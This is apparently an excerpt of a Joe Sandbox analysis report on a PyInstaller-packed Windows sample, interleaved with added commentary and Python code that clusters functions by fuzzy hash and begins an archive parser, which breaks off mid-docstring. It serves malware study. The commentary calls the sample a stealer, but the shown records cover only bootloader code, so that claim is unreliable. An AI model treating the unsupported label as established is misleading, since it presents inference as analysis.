                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
                                                                                                                                                                                                                                        • Instruction ID: 30afed4ef3c32be3ea3605005c35372a68f52125249dda3c3a911f07ceeb5580
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB610C22E0C15246FBA8BA289444B7DE685BF40760FFC0239D69D466C5FF6DEC08C722
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                        • Instruction ID: 443a1397d8944c37db6e23d77d5a83663081e6076588b6367165fda4696947af
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8651C576A1D652C6E7249BA8E040A38BBA0FB54B58F744231CE4C477D4EB3AEC47C751
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                        • Instruction ID: 984e4125b308fdc0e568a4371ac1cd48e4d0a84f9de52bf1df9cc309758da792
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E517F76A5C651C2E7249F69E040A28A3A0FB94F68FB44131CE4C1B7D4EB3AEC47C752
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                        • Instruction ID: cd5fce4b1f65f90b53cafdb82dfc57184c6dba80c483b256fbdcbfa91055e2fc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A51B432A1C651C2E7249FA9E040A38BBA0FB54B68FB44131DA4D577D4EB3AEC47C791
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
• API String ID:
• Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
• Instruction ID: 0eaa4aead400b506798bdca607f4ccc9bb4c21ed5b6ebc87466fc073fb22695d
• Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
• Instruction Fuzzy Hash: 1851B036A5C652C6E7249B68E040B38B7A0FB44B58FB54031CE4C177E8EB3AEC46C751
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
• Instruction ID: 3bfcad7f0dfb07c0f805a37f2ab3a0c339be2792e357d709ee5a82986354a1d7
• Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
• Instruction Fuzzy Hash: 7051BE37A1C651C6E7249FA9E040A3CABA1FB45B58FB44031CA4C17798EB3AEC46C791
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
• Instruction ID: 62718109949da17f1dba479c59f611c5cc6d3b0b24373a8d1f369bfc637bc79e
• Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
• Instruction Fuzzy Hash: EC51AF33A1CA51C6E7249BA9E040A3CABA1FB45B58FB44131CE4C177A4EB3AEC47C751
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
• Instruction ID: 746e9be1905881e63524dd3d8a0fec78f6c73e0f6584988dfa765490dc825bf7
• Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
• Instruction Fuzzy Hash: E541996280E64AC4ED55D9E85504E78A680BF62BA0EF85270DD99537C2FD0EED4EC123
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
• Instruction ID: 06c9f5f90ca3a2f4b2d147d68bde127a6b59ad1dec882ada104ec033341511c5
• Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
• Instruction Fuzzy Hash: C9413632718A4581EF08DF6AE914569B3A1FB48FC4BB99432DE0D97B58EE3DC845C301
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
• Instruction ID: 10de8b6945cb83507c0a085093c9381b34a55cac5db960aa027bf6dc3117bb8c
• Opcode Fuzzy Hash: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
• Instruction Fuzzy Hash: 3731C332A0CB4281E754AF71744052EA694BB84BA0FB44239EA9D53BD5EF3CD805C315
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
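The blocks above are the per-function records the Joe Sandbox IDA plugin emits: an Opcode ID, an Instruction Fuzzy Hash, and the memory-dump region the function was lifted from. Three sibling functions at the top of this section carry fuzzy hashes that differ in only a handful of nibbles, while the ErrorFreeHeapLast wrapper is far from all of them. The following Python is an added example, not Joe Sandbox code: it parses these blocks from the report text, decodes the image base and page protection of the dump region, and clusters functions by a nibble-wise Hamming distance over the fuzzy hash. Assumptions, marked in the code: the layout of the .sdmp file name beyond the start-address and protection fields is inferred from the report rather than documented; the Hamming-distance metric and the threshold of 25 nibbles are a heuristic of this example, not Joe Sandbox's own similarity score; and the sample text is a constructed excerpt of the blocks on this page, reduced to the lines the parser reads.

```python
"""Parse Joe Sandbox 'Similarity' function blocks and cluster near-duplicate
functions by instruction fuzzy hash.  Added example, not Joe Sandbox code; the
.sdmp name layout and the Hamming-distance metric are assumptions (see below)."""
import re
from dataclasses import dataclass

# winnt.h page-protection constants; the value sits in the 5th .sdmp field (assumed layout).
PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# Constructed sample: three blocks copied from this report, reduced to the lines parsed here.
SAMPLE = """\
Similarity
• API ID:
• Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
• Instruction Fuzzy Hash: 1851B036A5C652C6E7249B68E040B38B7A0FB44B58FB54031CE4C177E8EB3AEC46C751
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
Similarity
• API ID:
• Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
• Instruction Fuzzy Hash: 7051BE37A1C651C6E7249FA9E040A3CABA1FB45B58FB44031CA4C17798EB3AEC46C791
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
Similarity
• API ID: ErrorFreeHeapLast
• Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
• Instruction Fuzzy Hash: C9413632718A4581EF08DF6AE914569B3A1FB48FC4BB99432DE0D97B58EE3DC845C301
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
"""

FIELDS = {"Opcode ID": "opcode_id", "Instruction Fuzzy Hash": "fuzzy_hash", "API ID": "api_id"}
SOURCE_RE = re.compile(r"(\S+\.sdmp), Offset: ([0-9A-Fa-f]+)")


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    fuzzy_hash: str = ""
    api_id: str = ""
    dump_file: str = ""
    module_base: int = 0    # "Offset:" value, the PE image base in the dump
    start_address: int = 0  # start of the dumped region (4th .sdmp field)
    protection: str = ""    # decoded 5th .sdmp field


def parse_dump_name(name: str):
    """Decode start address and protection from a .sdmp name.  Assumed layout,
    inferred from the report: <proc>.<dump>.<id>.<start>.<protection>.<flags...>.sdmp;
    only fields 3 and 4 are used, the remaining flags are left undecoded."""
    parts = name.split(".")
    prot = int(parts[4], 16)
    return int(parts[3], 16), PAGE_PROTECTION.get(prot, f"0x{prot:02X}")


def parse_blocks(text: str):
    """Split the listing into FunctionRecords; each 'Similarity' line starts one."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "Similarity":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or ":" not in line:
            continue
        key, _, value = line.partition(":")  # first colon only: the Source File line has more
        key, value = key.strip(), value.strip()
        if key in FIELDS:
            setattr(cur, FIELDS[key], value)
        elif key == "Source File" and (m := SOURCE_RE.match(value)):
            cur.dump_file, cur.module_base = m.group(1), int(m.group(2), 16)
            cur.start_address, cur.protection = parse_dump_name(cur.dump_file)
    return records


def section_rva(rec: FunctionRecord) -> int:
    """RVA of the dumped region inside the PE: start address minus image base."""
    return rec.start_address - rec.module_base


def fuzzy_distance(a: str, b: str) -> int:
    """Nibble-wise Hamming distance between equal-length hex fuzzy hashes.  Heuristic
    assumption: the report's hash algorithm is not given, but sibling functions here
    differ in only a few nibbles, so positional comparison is a usable first pass."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes of different length are not comparable")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))


def cluster_functions(records, max_distance: int = 25):
    """Greedy clustering: a record joins the first cluster whose seed is within max_distance."""
    clusters = []
    for rec in records:
        for cl in clusters:
            if fuzzy_distance(cl[0].fuzzy_hash, rec.fuzzy_hash) <= max_distance:
                cl.append(rec)
                break
        else:
            clusters.append([rec])
    return clusters


if __name__ == "__main__":
    for cl in cluster_functions(parse_blocks(SAMPLE)):
        print([(r.opcode_id[:8], r.api_id or "-", r.protection) for r in cl])
```

On the sample, the two unnamed sibling functions land in one cluster and the ErrorFreeHeapLast wrapper in another; all three come from the region at 0x7FF78DA51000, which is RVA 0x1000 of the image based at 0x7FF78DA50000 and carries PAGE_EXECUTE_READ, i.e. the executable code section of the PyInstaller stub. When applying the distance heuristic to a whole report, check that compared hashes have the same length first (the function raises otherwise) and treat the threshold as something to calibrate against known library functions, not as a fixed constant.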
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
• Instruction ID: 9f75ebcdf39393c0ebfb282d70558a24d25536e3edd9fd10a10578a443760137
• Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
• Instruction Fuzzy Hash: 7EF0C87571C2519ADB98DF78A802A2A77E1F7083C0FA08039D59C83B14EA3CC461DF14
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                        • Instruction ID: 499e0fd42110caf9fdccb5f266ff4bf463625b06d34f1a7cfa703cfd9cb24177
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99A002A190DC0AD0EA44AF40E8A0875A330FB60314BF00071F05D814B0FF3CAC48D363
APIs
• GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA55830
• GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA55842
• GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA55879
• GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA5588B
• GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA558A4
• GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA558B6
• GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA558CF
• GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA558E1
• GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA558FD
• GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA5590F
• GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA5592B
• GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA5593D
• GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA55959
• GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA5596B
• GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA55987
• GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA55999
• GetProcAddress.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA559B5
• GetLastError.KERNEL32(?,00007FF78DA564BF,?,00007FF78DA5336E), ref: 00007FF78DA559C7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 199729137-653951865
• Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
• Instruction ID: fef82d59517939dd146c14e1ff82832a8dcacd02e2e7bb97cdbdc97c2b4d5b7b
• Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
• Instruction Fuzzy Hash: DA228D64A0DF07D1FA55FFA5A8149B4A2A1BF04785BF41035C8AE423A0FF3DAD4DD262
APIs
  • Part of subcall function 00007FF78DA59400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF78DA545E4,00000000,00007FF78DA51985), ref: 00007FF78DA59439
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF78DA588A7,?,?,00000000,00007FF78DA53CBB), ref: 00007FF78DA5821C
  • Part of subcall function 00007FF78DA52810: MessageBoxW.USER32 ref: 00007FF78DA528EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 1662231829-930877121
• Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
• Instruction ID: 23054a6fd8a26b0dc214830d14919f2e1e36ddfb21da7f8b43014f6db94a4899
• Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
• Instruction Fuzzy Hash: D951A211A2D64291EB50BBA0E851EBAE270BF94790FF44031D95EC66D5FE2CEC0DC762
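The two functions above are the PyInstaller bootloader's own code, not the grabber: the first resolves the Py* C-API symbols from the bundled Python DLL with GetProcAddress (hence "Failed to get address for %hs"), the second expands and creates the runtime-tmpdir named by a pyi-runtime-tmpdir option. That matches the "Found pyInstaller" signature, and it means the stealer logic is in the CArchive appended to the PE, not in the disassembled functions listed here. The following is an added example and is not part of the Joe Sandbox report or of PyInstaller's code: it finds the CArchive cookie from the end of the file, parses the table of contents, lists runtime options (where a pyi-runtime-tmpdir entry would appear) and inflates one entry. The cookie and TOC layouts follow PyInstaller's bootloader structs; the MZ prefix, entry names, the runtime-tmpdir value and the python312.dll name are constructed for the sample archive.

```python
"""Locate and parse the PyInstaller CArchive appended to a packed PE.

Added example for this report, not code from Joe Sandbox or PyInstaller.
The cookie and TOC structs follow PyInstaller's bootloader (pyi_archive.c);
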